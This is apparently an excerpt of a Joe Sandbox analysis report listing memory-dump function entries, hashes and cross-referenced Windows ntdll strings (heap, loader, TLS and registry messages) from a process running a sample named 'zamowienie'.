                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U4
                                                                                                                                              • API String ID: 0-1235668821
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U4${
                                                                                                                                              • API String ID: 0-2183333318
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                              • API String ID: 0-2586055223
                                                                                                                                              • Opcode ID: b9a1e2fa5a8dbcea085af706fdb24095159d29f0ded468ff7013d48c829c759d
                                                                                                                                              • Instruction ID: f46acb57d09a6b3b389bbb0b3c7c3ae6ff8a466105a7e567d626f8e6748e9652
                                                                                                                                              • Opcode Fuzzy Hash: b9a1e2fa5a8dbcea085af706fdb24095159d29f0ded468ff7013d48c829c759d
                                                                                                                                              • Instruction Fuzzy Hash: 7061E276205741EFE311CB64C944F677BE8EF84798F084C68E9948B3A1DB34D946CB61
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                              • API String ID: 0-1391187441
                                                                                                                                              • Opcode ID: 26e3adb0821bc28d7faf8452d5d4dd12f11b65b3129b7e979a4a4ee136e52678
                                                                                                                                              • Instruction ID: 91585f2124aef4743396882a6a5e82a3fa478a1ef88ed0b4590fe0263a2366e6
                                                                                                                                              • Opcode Fuzzy Hash: 26e3adb0821bc28d7faf8452d5d4dd12f11b65b3129b7e979a4a4ee136e52678
                                                                                                                                              • Instruction Fuzzy Hash: B831E136600224EFD705CB44CC84FAABBF8EF45760F154555E814AB292DB31ED81CF61
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                                                                                              • API String ID: 0-4256168463
                                                                                                                                              • Opcode ID: e47dc091142336511acb3e8f54261e7558dc8bb7347f37659af91b396eb926a1
                                                                                                                                              • Instruction ID: bd7da8692df6427d4cf082526d3673baf4e0cc072da790b5d325a5824074ba38
                                                                                                                                              • Opcode Fuzzy Hash: e47dc091142336511acb3e8f54261e7558dc8bb7347f37659af91b396eb926a1
                                                                                                                                              • Instruction Fuzzy Hash: E601F136121720EFEB19DF64C440BEAB3E9EF02664F1C489AE4019B241DA74ED86CA64
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 9611fd29abab1e271acb6bd8a2f8631535434a26c58b11330ac7e2d754026d2c
                                                                                                                                              • Instruction ID: 53470213d8381cdd7f5c9a801e0639c5b3ee41171b75d3fb4bea687f5e505f1c
                                                                                                                                              • Opcode Fuzzy Hash: 9611fd29abab1e271acb6bd8a2f8631535434a26c58b11330ac7e2d754026d2c
                                                                                                                                              • Instruction Fuzzy Hash: CB510E75E00609EFFB04DFA8CD44BAEB7B4FF04355F1546A9E401932A0EB75A906DB80
                                                                                                                                              Strings
                                                                                                                                              • HEAP: , xrefs: 34EF1596
                                                                                                                                              • HEAP[%wZ]: , xrefs: 34EF1712
                                                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34EF1728
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-3178619729
                                                                                                                                              • Opcode ID: c3a4ff5e312b75ff29ea489dfa89c64621ceaeaf1444724ca1623c252f142f72
                                                                                                                                              • Instruction ID: 93ad256e7916e3fcd22b4ec4655ae0101fe9df8f1e1d0e69459369abc0d2d4f6
                                                                                                                                              • Opcode Fuzzy Hash: c3a4ff5e312b75ff29ea489dfa89c64621ceaeaf1444724ca1623c252f142f72
                                                                                                                                              • Instruction Fuzzy Hash: A3E1EF78A047499FE718CF28C850A7AFBF5EF49304F19885DE49A8B286DB35ED41CB50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                              • API String ID: 0-2391371766
                                                                                                                                              • Opcode ID: 4c42779872b45955eabb38e0d5673deaa9bf62679a265769e8be369550c5ce2a
                                                                                                                                              • Instruction ID: ae451b34ba5550e47da707ad215703c657563582d5ccf588b6a1487eac7f8156
                                                                                                                                              • Opcode Fuzzy Hash: 4c42779872b45955eabb38e0d5673deaa9bf62679a265769e8be369550c5ce2a
                                                                                                                                              • Instruction Fuzzy Hash: 52B1ADB6605345AFF311CF54D880B5BBBE8EF44790F490C2AFA40A7290D778E846CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                              • API String ID: 0-318774311
                                                                                                                                              • Opcode ID: ec0167f720335c3051f40c0e890c1c27ee096b4f104bc4acc5b5741e876b93b3
                                                                                                                                              • Instruction ID: c80748ae945cb7a71b3678486e3a309e8bd10ccd0fdf19290a8845bf4e569d36
                                                                                                                                              • Opcode Fuzzy Hash: ec0167f720335c3051f40c0e890c1c27ee096b4f104bc4acc5b5741e876b93b3
                                                                                                                                              • Instruction Fuzzy Hash: D3819CB6609345AFE311CB14C840B6AB7E8FF85750F484D2DF9889B3A0DB75D906CB62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                              • API String ID: 0-3870751728
                                                                                                                                              • Opcode ID: 66fbe546dfd514c784d9d56e57a347cd4f1db34a361bea072d933e66604fd75a
                                                                                                                                              • Instruction ID: 1ea36b4f15df11c4798934cf0e58183871a4206bdfff6c1cf2cb2408e7e2061f
                                                                                                                                              • Opcode Fuzzy Hash: 66fbe546dfd514c784d9d56e57a347cd4f1db34a361bea072d933e66604fd75a
                                                                                                                                              • Instruction Fuzzy Hash: 21914EB4E10205DFEB14CF69C880B9DBBF1BF48354F18856AD904AB395E779A842CF94
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %$&$@
                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                              • Opcode ID: c92d700937f55cd1656cca1e2ad99d2471f149189b200d624f0f80c388618790
                                                                                                                                              • Instruction ID: 20da76b76e9d0e74a4b6496eaee50f4b681bddf8a5430a75cbbb355db65555e2
                                                                                                                                              • Opcode Fuzzy Hash: c92d700937f55cd1656cca1e2ad99d2471f149189b200d624f0f80c388618790
                                                                                                                                              • Instruction Fuzzy Hash: 55717C796093419FE304CF21C980A1BBBE9FF85658F588D1DE4AA67290D731D907CF92
                                                                                                                                              Strings
                                                                                                                                              • GlobalizationUserSettings, xrefs: 34FCB834
                                                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 34FCB82A
                                                                                                                                              • TargetNtPath, xrefs: 34FCB82F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                              • API String ID: 0-505981995
                                                                                                                                              • Opcode ID: 1619495ba8941925a9a30c62367eb66c0c102a7102addf6da6abaf919ad2a3a1
                                                                                                                                              • Instruction ID: 4dd8cf50e2f55513025dd857b77a4e346935a8a84e190d1b4214d51e6b1988c3
                                                                                                                                              • Opcode Fuzzy Hash: 1619495ba8941925a9a30c62367eb66c0c102a7102addf6da6abaf919ad2a3a1
                                                                                                                                              • Instruction Fuzzy Hash: C261B17698122AAFEB30CF54DC88BDAB7B8EF14750F0505E9E508A7250C7349E85CF90
                                                                                                                                              Strings
                                                                                                                                              • HEAP: , xrefs: 34F4E6B3
                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 34F4E6C6
                                                                                                                                              • HEAP[%wZ]: , xrefs: 34F4E6A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                              • API String ID: 0-1340214556
                                                                                                                                              • Opcode ID: 385753660b65f38b6a59b85e059a537f3c648396ac809ec30e1d4400919ea4b8
                                                                                                                                              • Instruction ID: 0f686f1c26e9d992f15fd133e6497e429a1c825db3cb4ecb3f812efa221dbd47
                                                                                                                                              • Opcode Fuzzy Hash: 385753660b65f38b6a59b85e059a537f3c648396ac809ec30e1d4400919ea4b8
                                                                                                                                              • Instruction Fuzzy Hash: BD51A175711744EFE312CBA4C944BAABBF8BF05344F0844A5E584CB692DB74E982CB54
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 34F5A59A
                                                                                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 34F5A589
                                                                                                                                              • LdrpCompleteMapModule, xrefs: 34F5A590
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                              • API String ID: 0-1676968949
                                                                                                                                              • Opcode ID: 271422b4d9d451e9f8d22c113ca1d82381d92f695dd4c0adada53f3bb8e6b574
                                                                                                                                              • Instruction ID: 9f3a15d4a1d4d48e64b60a8096a80238b4c2b29a50e3e77fe8a0b4cae3d0cb73
                                                                                                                                              • Opcode Fuzzy Hash: 271422b4d9d451e9f8d22c113ca1d82381d92f695dd4c0adada53f3bb8e6b574
                                                                                                                                              • Instruction Fuzzy Hash: 6951EEB9A00745DFE711DA68CA40B1A7BE8EF04794F1C0AA9E9519B6E1DB35EC42CB40
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                              • API String ID: 0-1151232445
                                                                                                                                              • Opcode ID: 74f5246717567b17065715ff580950b8ad546fa895f08041e36a1c3e7e77d22d
                                                                                                                                              • Instruction ID: 94384ba08d6db171d2e9b1b898fd1d89434f44c6f529b059d93cc26f638dbc00
                                                                                                                                              • Opcode Fuzzy Hash: 74f5246717567b17065715ff580950b8ad546fa895f08041e36a1c3e7e77d22d
                                                                                                                                              • Instruction Fuzzy Hash: 1041E2B8B00341CFEB15DA58C4817B97BA4DB01398F584DADD4858B286DF64D8C6EB61
                                                                                                                                              Strings
                                                                                                                                              • LdrpAllocateTls, xrefs: 34F61B40
                                                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34F61B39
                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 34F61B4A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                              • API String ID: 0-4274184382
                                                                                                                                              • Opcode ID: ccd09a5eb4bf5bb4187fed0363ee6da19e2b3f375edea00fea0fc8036735376f
                                                                                                                                              • Instruction ID: 1022e2c52a03aed2c2ddfdc9358e3b4fad5b504b6fab816a555f9a65e3e3a561
                                                                                                                                              • Opcode Fuzzy Hash: ccd09a5eb4bf5bb4187fed0363ee6da19e2b3f375edea00fea0fc8036735376f
                                                                                                                                              • Instruction Fuzzy Hash: 27418FB5A01608EFEB15DFA8CD40BAEBBF5FF88304F088919E405A7250D775A802CF94
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-964947082
                                                                                                                                              • Opcode ID: f6357f243db663847a861a87b4af1154d456576f9656ce6dfb257121e4b0fea0
                                                                                                                                              • Instruction ID: 83ccd93896198631462dab449e0fe54d830233e8f21bef27bea9af8d0ca9b3e0
                                                                                                                                              • Opcode Fuzzy Hash: f6357f243db663847a861a87b4af1154d456576f9656ce6dfb257121e4b0fea0
                                                                                                                                              • Instruction Fuzzy Hash: 0C41BFB5611368EFE760CF549980E7A3BF9EB44318F88586DEA01AB251C630D886CF95
                                                                                                                                              Strings
                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 34F629FE
                                                                                                                                              • Actx , xrefs: 34F233AC
                                                                                                                                              • RtlCreateActivationContext, xrefs: 34F629F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                              • Opcode ID: 3f364f27fe1da18cec4f0e34a47597dae05c029c20b73c3bd7f7b5839a624caf
                                                                                                                                              • Instruction ID: 1c4a3f9ae9d18b2d33bd5ff43a780c8e95efad9de033e6056d73ef23f3b4fe4c
                                                                                                                                              • Opcode Fuzzy Hash: 3f364f27fe1da18cec4f0e34a47597dae05c029c20b73c3bd7f7b5839a624caf
                                                                                                                                              • Instruction Fuzzy Hash: 43314276600705DFEB16DEA8D880F9B37A4EF44764F4988A9EC059F285CB78D843CB90
                                                                                                                                              Strings
                                                                                                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 34F7B632
                                                                                                                                              • @, xrefs: 34F7B670
                                                                                                                                              • GlobalFlag, xrefs: 34F7B68F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                              • API String ID: 0-4192008846
                                                                                                                                              • Opcode ID: c5c907b23e1807cdcc47e80e2754924e6448f9e9ca7ee136091bf7816755c2a6
                                                                                                                                              • Instruction ID: dba831978d6befca6ff2ffe9a2dee53f4ca4653e94ab8a2c9d6416e897eb4525
                                                                                                                                              • Opcode Fuzzy Hash: c5c907b23e1807cdcc47e80e2754924e6448f9e9ca7ee136091bf7816755c2a6
                                                                                                                                              • Instruction Fuzzy Hash: E7313EB5D00209AFEB10DF94DC80EEEBB78EF45784F5448AEE605A7250D7749A05CBA4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                                                                                              • API String ID: 0-1050206962
                                                                                                                                              • Opcode ID: d358c773a2db5cba16ece6570f60964ad3d3ed4c356a0d4e635435eb3496420a
                                                                                                                                              • Instruction ID: 87ef955288f3376d1fbbbdedd90e321f0227534b9c42876f34b8a1932086819b
                                                                                                                                              • Opcode Fuzzy Hash: d358c773a2db5cba16ece6570f60964ad3d3ed4c356a0d4e635435eb3496420a
                                                                                                                                              • Instruction Fuzzy Hash: 05317AB2900219EFFB11DE94CD80EEFBBBDEB49654F494875E904A7210D7349D068BA0
                                                                                                                                              Strings
                                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 34F61A40
                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 34F61A51
                                                                                                                                              • LdrpInitializeTls, xrefs: 34F61A47
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
